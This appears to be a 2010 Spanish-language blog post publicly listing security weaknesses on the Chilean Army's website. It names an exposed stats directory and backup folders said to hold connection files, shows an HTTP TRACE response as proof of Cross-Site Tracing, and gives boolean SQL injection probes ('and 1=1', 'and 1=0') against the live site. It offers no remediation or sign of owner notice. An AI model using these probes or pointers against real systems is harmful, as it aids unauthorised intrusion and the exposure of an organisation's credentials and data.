--------------------------------------------------------------------------------------------------
Infomacion:
[+] lo que podemos encontrar en al web es el directorio stats que nos muestra
infomacion de dos dominios.
ver link:
http://www.ejercitodechile.cl/
[+] luego encontratemos unos backup dentro del directorio /nuestro_ejercito/
que nos muestra los file de conexiones y otros.etc...
ver link:
http://www.ejercitodechile.cl/
Vulnerabilidades:
[+] Lo que pude encontrar en esta web fue un bug de Coss Site Tracing.
HTTP/1.1 200 OK
Date: Mon, 11 Oct 2010 21:59:05 GMT
Server: Apache
Connection: close
Transfer-Encoding: chunked
Content-Type: message/http
32
TRACE / HTTP/1.1
Host: www.ejercitodechile.cl
0
[+] Ademas uno de los bug mas utilizados actualmente que es el SQLi.
ver link:
http://www.ejercitodechile.cl/ --> and 1=1
http://www.ejercitodechile.cl/ --> and 1=0
No hay comentarios:
Publicar un comentario